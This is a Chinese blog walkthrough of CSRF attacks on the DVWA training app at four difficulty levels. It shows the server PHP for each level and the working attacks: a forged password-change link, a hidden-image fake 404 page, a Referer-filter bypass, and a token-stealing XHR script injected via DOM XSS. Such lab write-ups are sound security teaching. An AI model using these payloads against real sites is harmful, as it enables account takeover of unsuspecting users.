CSRF

最新推荐文章于 2024-05-22 22:09:28 发布
最新推荐文章于 2024-05-22 22:09:28 发布
阅读量527 收藏 4
点赞数
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/angry_program/article/details/104181004
版权

前言

CSRF,  跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性, 两者区别于CSRF是跨站请求, XSS是跨站攻击。但事实上CSRF与XSS差别很大,XSS利用的是站点内的信任用户,而CSRF则是通过伪装来自受信任用户的请求来利用受信任的网站。

CSRF通过伪装来自受信任用户的请求来利用受信任的网站。通俗的说就是攻击者利用了你的身份(比如利用cookie登录),发送了恶意请求。就好比黑客盗用了你的qq然后假装是你,骗你朋友要钱。(也可以理解为钓鱼网站)
 

下面分别分析四种难度:

 

  • Low

服务端核心代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Get input
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update the database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match.</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

可以看到,  服务端只是对两次输入的新密码进行对比是否相等,  然后对数据库进行更新, 并采用md5加密。也没有任何的防CSRF机制(当然服务器对请求的发送者是做了身份验证的,是检查的cookie,只是这里的代码没有体现)。

 

漏洞利用

就像之前的博客  漏洞之CSRF攻击  举例所述,  CSRF攻击者可以构造链接或者页面,  诱导受害者点击之,  从而完成不察觉的攻击。

1.  最基础的构造链接

http://localhost/DVWA/vulnerabilities/csrf/index.php
?password_new=hack
&password_conf=hack
&Change=Change#

当受害者点击了这个链接, 密码就会被改为hack, (当然了,  在真实的环境下是公网的ip,  这里只做一个本地的演示)

查看一下数据库里的密码是否更改了,  发现密码是md5加密的,  我们解密:

CSRF最关键的是利用受害者的cookie向服务器发送伪造请求,  这里还有一个小知识点:  A游览器留下的cookie不能在B游览器上使用。

所以当了受害者用了不同的游览器点击链接时,  攻击是不会被触发的。

事实上, 不得不说这个链接太明显了,不会有人点,  所以真正攻击场景下,我们需要对链接做一些处理。

2.  缩短攻击链接

用百度短网址工具:

https://dwz.cn/

需要提醒的是,虽然利用了短链接隐藏url,但受害者最终还是会看到密码修改成功的页面,所以这种攻击方法也并不高明。

3.  构造攻击页面

一般是构造与原网站一样钓鱼页面,  或者404页面

构造404攻击页面 hack.html (真实的攻击一般是在公网上,  这里就在本地访问演示):

<img src="http://localhost/DVWA/vulnerabilities/csrf/index.php?password_new=hack&password_conf=hack&Change=Change#" border="0"style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

当受害者访问之后,  会出现404的页面,  事实上他已经被攻击了:

 

 

  • Medium

服务端核心代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Checks to see where the request came from
	if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
		// Get input
		$pass_new  = $_GET[ 'password_new' ];
		$pass_conf = $_GET[ 'password_conf' ];

		// Do the passwords match?
		if( $pass_new == $pass_conf ) {
			// They do!
			$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
			$pass_new = md5( $pass_new );

			// Update the database
			$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
			$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

			// Feedback for the user
			$html .= "<pre>Password Changed.</pre>";
		}
		else {
			// Issue with passwords matching
			$html .= "<pre>Passwords did not match.</pre>";
		}
	}
	else {
		// Didn't come from a trusted source
		$html .= "<pre>That request didn't look correct.</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>
  • stripos() 函数

查找字符串在另一字符串中第一次出现的位置(不区分大小写)

可以看到,  服务端对Referer来源进行了对比判断, 变量 HTTP_REFERER(http包头的Referer参数的值,表示来源地址)中是否包含SERVER_NAME(http包头的Host参数,及要访问的主机名), 从而防止了跨站请求攻击

 

漏洞利用

这样的做法依然存在漏洞, 

1. 攻击者可以通过抓包修改Referer信息,  从而绕过防御。(事实上,  这样的抓包不太现实)

2. 过滤规则是http包头的Referer参数的值中必须包含主机名 (这里是192.168.10.105), 我们这里首先可以将之前的伪装404攻击页面重命名为: (受害者ip).html, 如 192.168.10.105.html

<img src="http://192.168.10.105/DVWA/vulnerabilities/csrf/index.php?password_new=hack&password_conf=hack&Change=Change#" border="0"style="display:none;"/>

<h1>404<h1>

<h2>file not found.<h2>

放置在攻击者的服务器 (192.168.10.100) 上,   当受害者打开这个网页时, 就会触发攻击:

事实上,  在真实环境中,  受害者的ip和攻击者的ip是处于公网的环境下的,  可以相互访问。上述攻击原理就是通过将攻击页面放置在攻击者的服务器中,  诱使受害者点击从而发动不易察觉的攻击 (攻击页面与原页面很相似, 甚至域名都很像)。虽然Medium级别中对Referer进行了判断,  过滤规则仅仅是Referer中必须包含(受害者ip)主机名,  攻击者只要将攻击页面的名字命名为与受害者ip一致即可绕过过滤,  从而发起攻击。

 

 

  • High

服务端核心代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Do the passwords match?
	if( $pass_new == $pass_conf ) {
		// They do!
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update the database
		$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
		$result = mysqli_query($GLOBALS["___mysqli_ston"],  $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match.</pre>";
	}

	((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

可以看到,High级别的代码加入了Anti-CSRF token机制,用户每次访问改密页面时,服务器会返回一个随机的token,向服务器发起请求时,需要提交token参数,而服务器在收到请求时,会优先检查token,只有token正确,才会处理客户端的请求。

 

漏洞利用

要绕过High级别的反CSRF机制,关键是要获取token,要利用受害者的cookie去修改密码的页面获取关键的token。

这里结合xss攻击,  试着去构造一个攻击页面,将其放置在攻击者的服务器,引诱受害者访问,从而完成CSRF攻击 (本地演示)

攻击代码: xss.js 

var theUrl = 'http://127.0.0.1/DVWA/vulnerabilities/csrf/index.php';
var pass = 'admin';
xmlhttp=new XMLHttpRequest();
xmlhttp.withCredentials = true;
var hacked = false;
xmlhttp.onreadystatechange=function(){
    if (xmlhttp.readyState==4 && xmlhttp.status==200)
    {
        var text = xmlhttp.responseText;
        var regex = /user_token' value='(.*)' />/;
        var match = text.match(regex);
        var token = match[1];
        var new_url = 'http://127.0.0.1/DVWA/vulnerabilities/csrf/index.php?user_token='+token+'&password_new='+pass+'&password_conf='+pass+'&Change=Change'
        if(!hacked){
            alert('Got token:' + match[1]);
            hacked = true;
            xmlhttp.open("GET", new_url, false );
            xmlhttp.send();  
        }
        count++;
    }
};
xmlhttp.open("GET", theUrl );
xmlhttp.send();

当受害者点击进入这个页面,脚本会通过一个看不见框架偷偷访问修改密码的页面,获取页面中的token,并向服务器发送改密请求,以完成CSRF攻击。

结合DOM XSS:

注入刚写的 xss.js 脚本:

http://localhost/DVWA/vulnerabilities/xss_d/index.php?default=English#<script src="http://localhost/DVWA/vulnerabilities/csrf/xss.js"></script>

弹出消息,说明攻击成功,此时admin的password已经改为了admin。

值得一提的是,  攻击者服务器A和受害者服务器B要么都处于公网中,  要么都处于局域网中(正如上一级别所演示的),  若B处于局域网中, 而A在公网中,  A是无法访问到B的,  因为局域网(C类ip)太多了, A根本无法定位B;  所以现在是不允许跨域请求的。

 

 

  • Impossible

服务端核心代码:

<?php

if( isset( $_GET[ 'Change' ] ) ) {
	// Check Anti-CSRF token
	checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

	// Get input
	$pass_curr = $_GET[ 'password_current' ];
	$pass_new  = $_GET[ 'password_new' ];
	$pass_conf = $_GET[ 'password_conf' ];

	// Sanitise current password input
	$pass_curr = stripslashes( $pass_curr );
	$pass_curr = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_curr ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
	$pass_curr = md5( $pass_curr );

	// Check that the current password is correct
	$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
	$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
	$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );
	$data->execute();

	// Do both new passwords match and does the current password match the user?
	if( ( $pass_new == $pass_conf ) && ( $data->rowCount() == 1 ) ) {
		// It does!
		$pass_new = stripslashes( $pass_new );
		$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
		$pass_new = md5( $pass_new );

		// Update database with new password
		$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );
		$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );
		$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );
		$data->execute();

		// Feedback for the user
		$html .= "<pre>Password Changed.</pre>";
	}
	else {
		// Issue with passwords matching
		$html .= "<pre>Passwords did not match or current password incorrect.</pre>";
	}
}

// Generate Anti-CSRF token
generateSessionToken();

?>

发现在impossible级别中, 将当前用户密码验证成功才能修改新密码,  这也是现在流行的做法,  从根本上杜绝了cookie被利用的情况。

 

 

  • 参考文章

DVWA-1.9全级别教程之CSRF

DVWA(3)-CSRF

angry_program
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bolt:CSRF扫描仪-源码
05-25
螺栓 笨拙的CSRF扫描仪 重要的 Bolt处于测试的Beta阶段,这意味着可能存在错误。 不鼓励使用此工具。 欢迎提出请求和问题。 如果您对此仓库感兴趣,我也建议您将它放在监视中。 工作流程 爬行 Bolt将目标网站爬网到指定的深度,并将找到的所有HTML表单存储在数据库中以进行进一步处理。 评估 在此阶段,Bolt找出不够强大的令牌和不受保护的形式。 比较中 此阶段专注于重播攻击场景的检测,因此检查令牌是否已发行多次。 它还计算所有令牌之间的平均,以查看它们是否相似。 还将令牌与250多种哈希模式的数据库进行比较。 观察 在此阶段,对单个网页同时发出100个请求,以查看是否为请求生成了相同的令牌。 测验 此阶段专用于CSRF保护机制的主动测试。 它包括但不限于检查moblie浏览器是否存在保护,使用自行生成的令牌提交请求以及测试是否将令牌检查到一定长度。 分析 在此阶段执行各种统计检查
CSRF跨站请求伪造CSRF PHP demo代码
05-04
CSRF跨站请求伪造CSRF PHP demo代码,带数据库,2021年5月4日,亲测可以运行
CSRF是什么
套路猿的博客
04-14 3746
一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取
CSRF 漏洞
Just a Blog
03-26 850
CSRF 漏洞
CSRF漏洞
金色%夕阳的博客
04-11 1766
CSRF漏洞 1. 漏洞介绍 1. 什么是CSRF漏洞 全名是 Cross Site Request Forgery,跨站请求伪造。通利用受害者还未失效的身份认证信息,诱骗其点击恶意的连接或访问受害者不知情的网站,在受害者不知情的情况下完成请求,从而达到一个攻击的目的。因为受害者点击之后就会触发恶意的代码完成恶意的请求,“one click”攻击。 跨站------通过A网站去访问B网站 请求------访问网站的过程就是请求 身份认证信息-----COOKIE与session 含有身份认证信息的字符串
CSRF攻击
一心一意码代码
03-13 497
一、什么是CSRF 攻击? 全称是Cross Site Request Forgery,即跨站请求伪造。利用用户已经登录的状态,跨站点发起伪造的请求。一般会诱导用户点击进黑客的网页。 特点: 跨站点的请求 请求是伪造的 利用用户的登录状态 二、CSRF类型 2.1 按照请求类型分为GET型和POST型。 例: GET型 目标网站A:www.a.com、恶意网站:B:www.b.com 攻击步骤 在恶意网站上编写代码<img src=http://www.a.com/blog/del?id=1&g
Go语言Gin框架安全加固:全面解析SQL注入、XSS与CSRF的解决方案
热门推荐
qq_35716689的博客
02-04 18万+
在使用 Gin 框架处理前端请求数据时,必须关注安全性问题,以防范常见的攻击。作者: 鼠鼠我捏,要死了捏
DVWA 之 CSRF
RexHa的博客
09-30 6712
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
CSRF 攻击详解
最新发布
只为成功找方法 不为失败找借口
05-22 898
禁用 CSRF 保护有其合理的应用场景,特别是在开发 RESTful API、使用其他防护措施、内部应用和非浏览器客户端时。然而,需要谨慎对待这个决定,并确保在适当的场景中启用 CSRF 保护,以防范潜在的安全风险。
csrftoken
rikka
10-28 1097
csrftoken CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。攻击者通过HTTP请求江数据传送到服务器,从而盗取回话的cookie。盗取回话cookie之后,攻击者不仅可以获取用户的信息,还可以修改该cookie关联的账户信息。 解决csrf攻击的最...
CSRF漏洞详细说明
02-26
Cross-SiteRequestForgery(CSRF),中文一般译作跨站请求伪造。经常入选owasp漏洞列表Top10,在当前web漏洞排行中,与XSS和SQL注入并列前三。与前两者相比,CSRF相对来说受到的关注要小很多,但是危害却非常大。...
csrf校验插件-js
05-03
使用该插件可以在使用js向后端提交数据时进行csrf校验
anticsrfCSRF预防库的示例用法
02-02
反抗 CSRF预防库的示例用法
详解Django的CSRF认证实现
09-20
主要介绍了详解Django的CSRF认证实现,详细的介绍了csrf原理和实现,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
CSRF demo代码
02-04
在 http://www.cnblogs.com/strick/p/6364097.html 有说明
CSRF总结
汪敏的博客
12-28 601
CSRF
CSRF 攻击
无知小九的博客
08-10 1687
这种方法解决了使用 cookie 单一验证方式时,可能会被冒用的问题,但是这种方法存在一个缺点就是,我们需要给网站中的所有请求都添加上这个 token,操作比较繁琐。第三种方式使用双重 Cookie 验证的办法,服务器在用户访问网站页面时,向请求域名注入一个Cookie,内容为随机字符串,然后当用户再次向服务器发送请求的时候,从 cookie 中取出这个字符串,添加到 URL 参数中,然后服务器通过对 cookie 中的数据和参数中的数据进行比较,来进行验证。同时这种方式不能做到子域名的隔离。...
csrfCSRF令牌创建和验证背后的逻辑
02-19
CSRF CSRF令牌创建和验证背后的逻辑。 阅读了解更多关于CSRF的信息。 使用此模块可以创建自定义CSRF中间件。 是否正在为使用该模块的最喜欢的框架寻找CSRF框架? 快速/连接: 或 Koa: 或 安装 $ npm install ...
python csrf
09-19
CSRF(Cross-Site Request Forgery)是一种常见的网络安全漏洞,攻击者利用用户的身份发起恶意请求。为了防止CSRF攻击,常常需要在请求中使用CSRF-Token来验证请求的合法性。在Python中,可以通过以下几种方式获取并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值